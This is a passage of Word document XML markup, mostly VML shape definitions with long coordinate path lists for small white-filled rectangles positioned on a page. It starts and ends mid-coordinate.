772,2998,5772,2997,5772,2995,5772,2994,5772,2993,5772,2992,5772,2990,5772,2989,5772,2988,5772,2986,5772,2985,5772,2983,5772,2982,5772,2980,5772,2979,5772,2977,5772,2975,5772,2974,5772,2972,5772,2970,5772,2968,5772,2966,5772,2964,5772,2962,5772,2960,5772,2958,5772,2956,5772,2954,5772,2952,5772,2950,5772,2948,5772,2945,5772,2943,5772,2941,5772,2938,5772,2936,5772,2933,5772,2931,5772,2928,5772,2925,5772,2923,5772,2920,5772,2917,5772,2914,5772,2911,5772,2908,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5772,2905,5771,2905,5771,2905,5771,2905,5771,2905,5771,2905,5771,2905,5771,2905,5771,2905,5770,2905,5770,2905,5770,2905,5770,2905,5769,2905,5769,2905,5769,2905,5768,2905,5768,2905,5767,2905,5767,2905,5766,2905,5766,2905,5765,2905,5765,2905,5764,2905,5764,2905,5763,2905,5762,2905,5761,2905,5761,2905,5760,2905,5759,2905,5758,2905,5757,2905,5756,2905,5755,2905,5754,2905,5753,2905,5752,2905,5751,2905,5749,2905,5748,2905,5747,2905,5745,2905,5744,2905,5742,2905,5741,2905,5739,2905,5738,2905,5736,2905,5734,2905,5732,2905,5730,2905,5728,2905,5726,2905,5724,2905,5722,2905,5720,2905,5718,2905,5715,2905,5713,2905,5711,2905,5708,2905,5705,2905,5703,2905,5700,2905,5697,2905,5694,2905,5691,2905,5688,2905,5685,2905,5682,2905,5679,2905,5676,2905,5672,2905,5669,2905,5665,2905,5662,2905,5658,2905,5654,2905,5650,2905,5646,2905,5642,2905,5638,2905,5634,2905,5629,2905,5625,2905,5621,2905,5616,2905,5611,2905,5606,2905,5602,2905,5597,2905,5592,2905,5586,2905,5581,2905,5576,2905,5570,2905,5565,2905,5559,2905,5553,2905,5548,2905,5542,2905,5536,2905,5529,2905,5523,2905,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:345.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,6910" coordsize="130,270">
        <v:shape style="position:absolute;left:4090;top:6910;width:130;height:270" coordorigin="4090,6910" coordsize="130,270" path="m4106,6927l4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4106,6927,4107,6927,4107,6927,4107,6927,4107,6927,4107,6927,4107,6927,4107,6927,4107,6927,4107,6927,4108,6927,4108,6927,4108,6927,4108,6927,4108,6927,4109,6927,4109,6927,4109,6927,4109,6927,4110,6927,4110,6927,4110,6927,4111,6927,4111,6927,4111,6927,4112,6927,4112,6927,4113,6927,4113,6927,4113,6927,4114,6927,4114,6927,4115,6927,4116,6927,4116,6927,4117,6927,4117,6927,4118,6927,4119,6927,4119,6927,4120,6927,4121,6927,4121,6927,4122,6927,4123,6927,4124,6927,4125,6927,4126,6927,4127,6927,4127,6927,4128,6927,4129,6927,4131,6927,4132,6927,4133,6927,4134,6927,4135,6927,4136,6927,4137,6927,4139,6927,4140,6927,4141,6927,4143,6927,4144,6927,4145,6927,4147,6927,4148,6927,4150,6927,4151,6927,4153,6927,4155,6927,4156,6927,4158,6927,4160,6927,4162,6927,4163,6927,4165,6927,4167,6927,4169,6927,4171,6927,4173,6927,4175,6927,4177,6927,4179,6927,4182,6927,4184,6927,4186,6927,4189,6927,4191,6927,4193,6927,4196,6927,4198,6927,4201,6927,4204,6927,4206,6927,4209,6927,4212,6927,4214,6927,4217,6927,4220,6927,4223,6927,4226,6927,4226,6927,4226,6927,4226,6927,4226,6927,4226,6927,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6928,4226,6929,4226,6929,4226,6929,4226,6929,4226,6929,4226,6930,4226,6930,4226,6930,4226,6930,4226,6931,4226,6931,4226,6932,4226,6932,4226,6932,4226,6933,4226,6933,4226,6934,4226,6935,4226,6935,4226,6936,4226,6936,4226,6937,4226,6938,4226,6939,4226,6940,4226,6940,4226,6941,4226,6942,4226,6943,4226,6944,4226,6945,4226,6946,4226,6948,4226,6949,4226,6950,4226,6951,4226,6953,4226,6954,4226,6956,4226,6957,4226,6959,4226,6960,4226,6962,4226,6964,4226,6965,4226,6967,4226,6969,4226,6971,4226,6973,4226,6975,4226,6977,4226,6979,4226,6982,4226,6984,4226,6986,4226,6989,4226,6991,4226,6994,4226,6997,4226,6999,4226,7002,4226,7005,4226,7008,4226,7011,4226,7014,4226,7017,4226,7020,4226,7024,4226,7027,4226,7031,4226,7034,4226,7038,4226,7042,4226,7045,4226,7049,4226,7053,4226,7057,4226,7061,4226,7066,4226,7070,4226,7074,4226,7079,4226,7083,4226,7088,4226,7093,4226,7098,4226,7103,4226,7108,4226,7113,4226,7118,4226,7124,4226,7129,4226,7135,4226,7140,4226,7146,4226,7152,4226,7158,4226,7164,4226,7170,4226,7176,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4226,7183,4225,7183,4225,7183,4225,7183,4225,7183,4225,7183,4225,7183,4225,7183,4225,7183,4224,7183,4224,7183,4224,7183,4224,7183,4224,7183,4223,7183,4223,7183,4223,7183,4223,7183,4222,7183,4222,7183,4222,7183,4221,7183,4221,7183,4220,7183,4220,7183,4220,7183,4219,7183,4219,7183,4218,7183,4218,7183,4217,7183,4217,7183,4216,7183,4216,7183,4215,7183,4214,7183,4214,7183,4213,7183,4212,7183,4211,7183,4211,7183,4210,7183,4209,7183,4208,7183,4207,7183,4207,7183,4206,7183,4205,7183,4204,7183,4203,7183,4202,7183,4201,7183,4200,7183,4198,7183,4197,7183,4196,7183,4195,7183,4194,7183,4192,7183,4191,7183,4190,7183,4188,7183,4187,7183,4185,7183,4184,7183,4182,7183,4181,7183,4179,7183,4178,7183,4176,7183,4174,7183,4172,7183,4171,7183,4169,7183,4167,7183,4165,7183,4163,7183,4161,7183,4159,7183,4157,7183,4155,7183,4153,7183,4151,7183,4148,7183,4146,7183,4144,7183,4141,7183,4139,7183,4136,7183,4134,7183,4131,7183,4129,7183,4126,7183,4123,7183,4121,7183,4118,7183,4115,7183,4112,7183,4109,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7183,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7182,4106,7181,4106,7181,4106,7181,4106,7181,4106,7181,4106,7180,4106,7180,4106,7180,4106,7179,4106,7179,4106,7179,4106,7178,4106,7178,4106,7177,4106,7177,4106,7176,4106,7176,4106,7175,4106,7174,4106,7174,4106,7173,4106,7172,4106,7171,4106,7171,4106,7170,4106,7169,4106,7168,4106,7167,4106,7166,4106,7165,4106,7164,4106,7163,4106,7161,4106,7160,4106,7159,4106,7157,4106,7156,4106,7155,4106,7153,4106,7152,4106,7150,4106,7148,4106,7147,4106,7145,4106,7143,4106,7141,4106,7139,4106,7137,4106,7135,4106,7133,4106,7131,4106,7128,4106,7126,4106,7124,4106,7121,4106,7119,4106,7116,4106,7113,4106,7111,4106,7108,4106,7105,4106,7102,4106,7099,4106,7096,4106,7093,4106,7090,4106,7086,4106,7083,4106,7079,4106,7076,4106,7072,4106,7069,4106,7065,4106,7061,4106,7057,4106,7053,4106,7049,4106,7044,4106,7040,4106,7036,4106,7031,4106,7027,4106,7022,4106,7017,4106,7012,4106,7007,4106,7002,4106,6997,4106,6992,4106,6987,4106,6981,4106,6976,4106,6970,4106,6964,4106,6958,4106,6952,4106,6946,4106,6940,4106,6934,4106,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.500pt;margin-top:345.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5290,6910" coordsize="130,270">
        <v:shape style="position:absolute;left:5290;top:6910;width:130;height:270" coordorigin="5290,6910" coordsize="130,270" path="m5307,6927l5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5307,6927,5308,6927,5308,6927,5308,6927,5308,6927,5308,6927,5308,6927,5308,6927,5309,6927,5309,6927,5309,6927,5309,6927,5309,6927,5310,6927,5310,6927,5310,6927,5311,6927,5311,6927,5311,6927,5312,6927,5312,6927,5312,6927,5313,6927,5313,6927,5314,6927,5314,6927,5315,6927,5315,6927,5316,6927,5316,6927,5317,6927,5317,6927,5318,6927,5319,6927,5319,6927,5320,6927,5321,6927,5321,6927,5322,6927,5323,6927,5324,6927,5324,6927,5325,6927,5326,6927,5327,6927,5328,6927,5329,6927,5330,6927,5331,6927,5332,6927,5333,6927,5334,6927,5336,6927,5337,6927,5338,6927,5339,6927,5340,6927,5342,6927,5343,6927,5345,6927,5346,6927,5347,6927,5349,6927,5350,6927,5352,6927,5354,6927,5355,6927,5357,6927,5359,6927,5360,6927,5362,6927,5364,6927,5366,6927,5368,6927,5370,6927,5372,6927,5374,6927,5376,6927,5378,6927,5380,6927,5382,6927,5385,6927,5387,6927,5389,6927,5392,6927,5394,6927,5396,6927,5399,6927,5402,6927,5404,6927,5407,6927,5409,6927,5412,6927,5415,6927,5418,6927,5421,6927,5424,6927,5427,6927,5427,6927,5427,6927,5427,6927,5427,6927,5427,6927,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6928,5427,6929,5427,6929,5427,6929,5427,6929,5427,6929,5427,6930,5427,6930,5427,6930,5427,6930,5427,6931,5427,6931,5427,6932,5427,6932,5427,6932,5427,6933,5427,6933,5427,6934,5427,6935,5427,6935,5427,6936,5427,6936,5427,6937,5427,6938,5427,6939,5427,6940,5427,6940,5427,6941,5427,6942,5427,6943,5427,6944,5427,6945,5427,6946,5427,6948,5427,6949,5427,6950,5427,6951,5427,6953,5427,6954,5427,6956,5427,6957,5427,6959,5427,6960,5427,6962,5427,6964,5427,6965,5427,6967,5427,6969,5427,6971,5427,6973,5427,6975,5427,6977,5427,6979,5427,6982,5427,6984,5427,6986,5427,6989,5427,6991,5427,6994,5427,6997,5427,6999,5427,7002,5427,7005,5427,7008,5427,7011,5427,7014,5427,7017,5427,7020,5427,7024,5427,7027,5427,7031,5427,7034,5427,7038,5427,7042,5427,7045,5427,7049,5427,7053,5427,7057,5427,7061,5427,7066,5427,7070,5427,7074,5427,7079,5427,7083,5427,7088,5427,7093,5427,7098,5427,7103,5427,7108,5427,7113,5427,7118,5427,7124,5427,7129,5427,7135,5427,7140,5427,7146,5427,7152,5427,7158,5427,7164,5427,7170,5427,7176,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5427,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5426,7183,5425,7183,5425,7183,5425,7183,5425,7183,5425,7183,5425,7183,5424,7183,5424,7183,5424,7183,5424,7183,5423,7183,5423,7183,5423,7183,5423,7183,5422,7183,5422,7183,5421,7183,5421,7183,5421,7183,5420,7183,5420,7183,5419,7183,5419,7183,5418,7183,5418,7183,5417,7183,5417,7183,5416,7183,5416,7183,5415,7183,5414,7183,5414,7183,5413,7183,5412,7183,5411,7183,5411,7183,5410,7183,5409,7183,5408,7183,5407,7183,5406,7183,5405,7183,5404,7183,5403,7183,5402,7183,5401,7183,5400,7183,5399,7183,5398,7183,5397,7183,5395,7183,5394,7183,5393,7183,5392,7183,5390,7183,5389,7183,5387,7183,5386,7183,5385,7183,5383,7183,5381,7183,5380,7183,5378,7183,5377,7183,5375,7183,5373,7183,5371,7183,5369,7183,5368,7183,5366,7183,5364,7183,5362,7183,5360,7183,5358,7183,5355,7183,5353,7183,5351,7183,5349,7183,5347,7183,5344,7183,5342,7183,5339,7183,5337,7183,5334,7183,5332,7183,5329,7183,5327,7183,5324,7183,5321,7183,5318,7183,5316,7183,5313,7183,5310,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7183,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7182,5307,7181,5307,7181,5307,7181,5307,7181,5307,7181,5307,7180,5307,7180,5307,7180,5307,7179,5307,7179,5307,7179,5307,7178,5307,7178,5307,7177,5307,7177,5307,7176,5307,7176,5307,7175,5307,7174,5307,7174,5307,7173,5307,7172,5307,7171,5307,7171,5307,7170,5307,7169,5307,7168,5307,7167,5307,7166,5307,7165,5307,7164,5307,7163,5307,7161,5307,7160,5307,7159,5307,7157,5307,7156,5307,7155,5307,7153,5307,7152,5307,7150,5307,7148,5307,7147,5307,7145,5307,7143,5307,7141,5307,7139,5307,7137,5307,7135,5307,7133,5307,7131,5307,7128,5307,7126,5307,7124,5307,7121,5307,7119,5307,7116,5307,7113,5307,7111,5307,7108,5307,7105,5307,7102,5307,7099,5307,7096,5307,7093,5307,7090,5307,7086,5307,7083,5307,7079,5307,7076,5307,7072,5307,7069,5307,7065,5307,7061,5307,7057,5307,7053,5307,7049,5307,7044,5307,7040,5307,7036,5307,7031,5307,7027,5307,7022,5307,7017,5307,7012,5307,7007,5307,7002,5307,6997,5307,6992,5307,6987,5307,6981,5307,6976,5307,6970,5307,6964,5307,6958,5307,6952,5307,6946,5307,6940,5307,6934,5307,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:432.500pt;margin-top:345.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8650,6910" coordsize="130,270">
        <v:shape style="position:absolute;left:8650;top:6910;width:130;height:270" coordorigin="8650,6910" coordsize="130,270" path="m8668,6927l8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8668,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8669,6927,8670,6927,8670,6927,8670,6927,8670,6927,8670,6927,8670,6927,8671,6927,8671,6927,8671,6927,8671,6927,8672,6927,8672,6927,8672,6927,8673,6927,8673,6927,8673,6927,8674,6927,8674,6927,8674,6927,8675,6927,8675,6927,8676,6927,8676,6927,8677,6927,8677,6927,8678,6927,8678,6927,8679,6927,8680,6927,8680,6927,8681,6927,8682,6927,8682,6927,8683,6927,8684,6927,8685,6927,8685,6927,8686,6927,8687,6927,8688,6927,8689,6927,8690,6927,8691,6927,8692,6927,8693,6927,8694,6927,8695,6927,8696,6927,8697,6927,8698,6927,8700,6927,8701,6927,8702,6927,8703,6927,8705,6927,8706,6927,8708,6927,8709,6927,8711,6927,8712,6927,8714,6927,8715,6927,8717,6927,8719,6927,8720,6927,8722,6927,8724,6927,8726,6927,8728,6927,8729,6927,8731,6927,8733,6927,8735,6927,8737,6927,8740,6927,8742,6927,8744,6927,8746,6927,8749,6927,8751,6927,8753,6927,8756,6927,8758,6927,8761,6927,8763,6927,8766,6927,8768,6927,8771,6927,8774,6927,8777,6927,8780,6927,8782,6927,8785,6927,8788,6927,8788,6927,8788,6927,8788,6927,8788,6927,8788,6927,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6928,8788,6929,8788,6929,8788,6929,8788,6929,8788,6929,8788,6930,8788,6930,8788,6930,8788,6930,8788,6931,8788,6931,8788,6932,8788,6932,8788,6932,8788,6933,8788,6933,8788,6934,8788,6935,8788,6935,8788,6936,8788,6936,8788,6937,8788,6938,8788,6939,8788,6940,8788,6940,8788,6941,8788,6942,8788,6943,8788,6944,8788,6945,8788,6946,8788,6948,8788,6949,8788,6950,8788,6951,8788,6953,8788,6954,8788,6956,8788,6957,8788,6959,8788,6960,8788,6962,8788,6964,8788,6965,8788,6967,8788,6969,8788,6971,8788,6973,8788,6975,8788,6977,8788,6979,8788,6982,8788,6984,8788,6986,8788,6989,8788,6991,8788,6994,8788,6997,8788,6999,8788,7002,8788,7005,8788,7008,8788,7011,8788,7014,8788,7017,8788,7020,8788,7024,8788,7027,8788,7031,8788,7034,8788,7038,8788,7042,8788,7045,8788,7049,8788,7053,8788,7057,8788,7061,8788,7066,8788,7070,8788,7074,8788,7079,8788,7083,8788,7088,8788,7093,8788,7098,8788,7103,8788,7108,8788,7113,8788,7118,8788,7124,8788,7129,8788,7135,8788,7140,8788,7146,8788,7152,8788,7158,8788,7164,8788,7170,8788,7176,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8788,7183,8787,7183,8787,7183,8787,7183,8787,7183,8787,7183,8787,7183,8787,7183,8786,7183,8786,7183,8786,7183,8786,7183,8785,7183,8785,7183,8785,7183,8785,7183,8784,7183,8784,7183,8784,7183,8783,7183,8783,7183,8782,7183,8782,7183,8781,7183,8781,7183,8781,7183,8780,7183,8780,7183,8779,7183,8778,7183,8778,7183,8777,7183,8777,7183,8776,7183,8775,7183,8775,7183,8774,7183,8773,7183,8772,7183,8771,7183,8771,7183,8770,7183,8769,7183,8768,7183,8767,7183,8766,7183,8765,7183,8764,7183,8763,7183,8762,7183,8761,7183,8760,7183,8758,7183,8757,7183,8756,7183,8755,7183,8753,7183,8752,7183,8751,7183,8749,7183,8748,7183,8746,7183,8745,7183,8743,7183,8742,7183,8740,7183,8738,7183,8736,7183,8735,7183,8733,7183,8731,7183,8729,7183,8727,7183,8725,7183,8723,7183,8721,7183,8719,7183,8717,7183,8715,7183,8713,7183,8711,7183,8708,7183,8706,7183,8704,7183,8701,7183,8699,7183,8696,7183,8694,7183,8691,7183,8688,7183,8686,7183,8683,7183,8680,7183,8677,7183,8674,7183,8671,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7183,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7182,8668,7181,8668,7181,8668,7181,8668,7181,8668,7181,8668,7180,8668,7180,8668,7180,8668,7179,8668,7179,8668,7179,8668,7178,8668,7178,8668,7177,8668,7177,8668,7176,8668,7176,8668,7175,8668,7174,8668,7174,8668,7173,8668,7172,8668,7171,8668,7171,8668,7170,8668,7169,8668,7168,8668,7167,8668,7166,8668,7165,8668,7164,8668,7163,8668,7161,8668,7160,8668,7159,8668,7157,8668,7156,8668,7155,8668,7153,8668,7152,8668,7150,8668,7148,8668,7147,8668,7145,8668,7143,8668,7141,8668,7139,8668,7137,8668,7135,8668,7133,8668,7131,8668,7128,8668,7126,8668,7124,8668,7121,8668,7119,8668,7116,8668,7113,8668,7111,8668,7108,8668,7105,8668,7102,8668,7099,8668,7096,8668,7093,8668,7090,8668,7086,8668,7083,8668,7079,8668,7076,8668,7072,8668,7069,8668,7065,8668,7061,8668,7057,8668,7053,8668,7049,8668,7044,8668,7040,8668,7036,8668,7031,8668,7027,8668,7022,8668,7017,8668,7012,8668,7007,8668,7002,8668,6997,8668,6992,8668,6987,8668,6981,8668,6976,8668,6970,8668,6964,8668,6958,8668,6952,8668,6946,8668,6940,8668,6934,8668,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:363.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,7270" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:7270;width:130;height:270" coordorigin="3730,7270" coordsize="130,270" path="m3746,7288l3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3746,7288,3747,7288,3747,7288,3747,7288,3747,7288,3747,7288,3747,7288,3747,7288,3747,7288,3748,7288,3748,7288,3748,7288,3748,7288,3748,7288,3749,7288,3749,7288,3749,7288,3749,7288,3750,7288,3750,7288,3750,7288,3751,7288,3751,7288,3752,7288,3752,7288,3752,7288,3753,7288,3753,7288,3754,7288,3754,7288,3755,7288,3755,7288,3756,7288,3756,7288,3757,7288,3758,7288,3758,7288,3759,7288,3760,7288,3761,7288,3761,7288,3762,7288,3763,7288,3764,7288,3765,7288,3765,7288,3766,7288,3767,7288,3768,7288,3769,7288,3770,7288,3771,7288,3772,7288,3774,7288,3775,7288,3776,7288,3777,7288,3778,7288,3780,7288,3781,7288,3782,7288,3784,7288,3785,7288,3787,7288,3788,7288,3790,7288,3791,7288,3793,7288,3794,7288,3796,7288,3798,7288,3800,7288,3801,7288,3803,7288,3805,7288,3807,7288,3809,7288,3811,7288,3813,7288,3815,7288,3817,7288,3819,7288,3821,7288,3824,7288,3826,7288,3828,7288,3831,7288,3833,7288,3836,7288,3838,7288,3841,7288,3843,7288,3846,7288,3849,7288,3851,7288,3854,7288,3857,7288,3860,7288,3863,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7289,3866,7289,3866,7289,3866,7289,3866,7289,3866,7290,3866,7290,3866,7290,3866,7290,3866,7291,3866,7291,3866,7291,3866,7292,3866,7292,3866,7293,3866,7293,3866,7294,3866,7294,3866,7295,3866,7295,3866,7296,3866,7297,3866,7297,3866,7298,3866,7299,3866,7300,3866,7301,3866,7301,3866,7302,3866,7303,3866,7304,3866,7305,3866,7307,3866,7308,3866,7309,3866,7310,3866,7312,3866,7313,3866,7314,3866,7316,3866,7317,3866,7319,3866,7320,3866,7322,3866,7324,3866,7326,3866,7327,3866,7329,3866,7331,3866,7333,3866,7335,3866,7337,3866,7340,3866,7342,3866,7344,3866,7347,3866,7349,3866,7352,3866,7354,3866,7357,3866,7360,3866,7362,3866,7365,3866,7368,3866,7371,3866,7374,3866,7377,3866,7381,3866,7384,3866,7387,3866,7391,3866,7394,3866,7398,3866,7402,3866,7406,3866,7409,3866,7413,3866,7417,3866,7422,3866,7426,3866,7430,3866,7435,3866,7439,3866,7444,3866,7448,3866,7453,3866,7458,3866,7463,3866,7468,3866,7473,3866,7478,3866,7484,3866,7489,3866,7495,3866,7500,3866,7506,3866,7512,3866,7518,3866,7524,3866,7530,3866,7536,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3866,7543,3865,7543,3865,7543,3865,7543,3865,7543,3865,7543,3865,7543,3865,7543,3865,7543,3865,7543,3864,7543,3864,7543,3864,7543,3864,7543,3864,7543,3863,7543,3863,7543,3863,7543,3863,7543,3862,7543,3862,7543,3862,7543,3861,7543,3861,7543,3861,7543,3860,7543,3860,7543,3859,7543,3859,7543,3859,7543,3858,7543,3858,7543,3857,7543,3856,7543,3856,7543,3855,7543,3855,7543,3854,7543,3853,7543,3853,7543,3852,7543,3851,7543,3851,7543,3850,7543,3849,7543,3848,7543,3847,7543,3846,7543,3845,7543,3845,7543,3844,7543,3843,7543,3842,7543,3840,7543,3839,7543,3838,7543,3837,7543,3836,7543,3835,7543,3833,7543,3832,7543,3831,7543,3829,7543,3828,7543,3827,7543,3825,7543,3824,7543,3822,7543,3821,7543,3819,7543,3817,7543,3816,7543,3814,7543,3812,7543,3810,7543,3809,7543,3807,7543,3805,7543,3803,7543,3801,7543,3799,7543,3797,7543,3795,7543,3793,7543,3790,7543,3788,7543,3786,7543,3783,7543,3781,7543,3779,7543,3776,7543,3774,7543,3771,7543,3769,7543,3766,7543,3763,7543,3760,7543,3758,7543,3755,7543,3752,7543,3749,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7543,3746,7542,3746,7542,3746,7542,3746,7542,3746,7542,3746,7542,3746,7542,3746,7542,3746,7541,3746,7541,3746,7541,3746,7541,3746,7540,3746,7540,3746,7540,3746,7539,3746,7539,3746,7539,3746,7538,3746,7538,3746,7537,3746,7537,3746,7536,3746,7536,3746,7535,3746,7534,3746,7534,3746,7533,3746,7532,3746,7532,3746,7531,3746,7530,3746,7529,3746,7528,3746,7527,3746,7526,3746,7525,3746,7524,3746,7523,3746,7522,3746,7520,3746,7519,3746,7518,3746,7516,3746,7515,3746,7513,3746,7512,3746,7510,3746,7508,3746,7507,3746,7505,3746,7503,3746,7501,3746,7499,3746,7497,3746,7495,3746,7493,3746,7491,3746,7489,3746,7486,3746,7484,3746,7481,3746,7479,3746,7476,3746,7474,3746,7471,3746,7468,3746,7465,3746,7462,3746,7459,3746,7456,3746,7453,3746,7450,3746,7447,3746,7443,3746,7440,3746,7436,3746,7432,3746,7429,3746,7425,3746,7421,3746,7417,3746,7413,3746,7409,3746,7405,3746,7400,3746,7396,3746,7391,3746,7387,3746,7382,3746,7377,3746,7372,3746,7368,3746,7362,3746,7357,3746,7352,3746,7347,3746,7341,3746,7336,3746,7330,3746,7324,3746,7318,3746,7313,3746,7306,3746,7300,3746,7294,3746,7288e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:363.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,7270" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:7270;width:130;height:270" coordorigin="3850,7270" coordsize="130,270" path="m3866,7288l3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3866,7288,3867,7288,3867,7288,3867,7288,3867,7288,3867,7288,3867,7288,3867,7288,3867,7288,3868,7288,3868,7288,3868,7288,3868,7288,3868,7288,3869,7288,3869,7288,3869,7288,3869,7288,3870,7288,3870,7288,3870,7288,3871,7288,3871,7288,3871,7288,3872,7288,3872,7288,3872,7288,3873,7288,3873,7288,3874,7288,3874,7288,3875,7288,3875,7288,3876,7288,3877,7288,3877,7288,3878,7288,3878,7288,3879,7288,3880,7288,3881,7288,3881,7288,3882,7288,3883,7288,3884,7288,3885,7288,3886,7288,3886,7288,3887,7288,3888,7288,3889,7288,3890,7288,3891,7288,3893,7288,3894,7288,3895,7288,3896,7288,3897,7288,3898,7288,3900,7288,3901,7288,3902,7288,3904,7288,3905,7288,3907,7288,3908,7288,3910,7288,3911,7288,3913,7288,3914,7288,3916,7288,3918,7288,3920,7288,3921,7288,3923,7288,3925,7288,3927,7288,3929,7288,3931,7288,3933,7288,3935,7288,3937,7288,3939,7288,3942,7288,3944,7288,3946,7288,3948,7288,3951,7288,3953,7288,3956,7288,3958,7288,3961,7288,3963,7288,3966,7288,3969,7288,3972,7288,3974,7288,3977,7288,3980,7288,3983,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7288,3986,7289,3986,7289,3986,7289,3986,7289,3986,7289,3986,7290,3986,7290,3986,7290,3986,7290,3986,7291,3986,7291,3986,7291,3986,7292,3986,7292,3986,7293,3986,7293,3986,7294,3986,7294,3986,7295,3986,7295,3986,7296,3986,7297,3986,7297,3986,7298,3986,7299,3986,7300,3986,7301,3986,7301,3986,7302,3986,7303,3986,7304,3986,7305,3986,7307,3986,7308,3986,7309,3986,7310,3986,7312,3986,7313,3986,7314,3986,7316,3986,7317,3986,7319,3986,7320,3986,7322,3986,7324,3986,7326,3986,7327,3986,7329,3986,7331,3986,7333,3986,7335,3986,7337,3986,7340,3986,7342,3986,7344,3986,7347,3986,7349,3986,7352,3986,7354,3986,7357,3986,7360,3986,7362,3986,7365,3986,7368,3986,7371,3986,7374,3986,7377,3986,7381,3986,7384,3986,7387,3986,7391,3986,7394,3986,7398,3986,7402,3986,7406,3986,7409,3986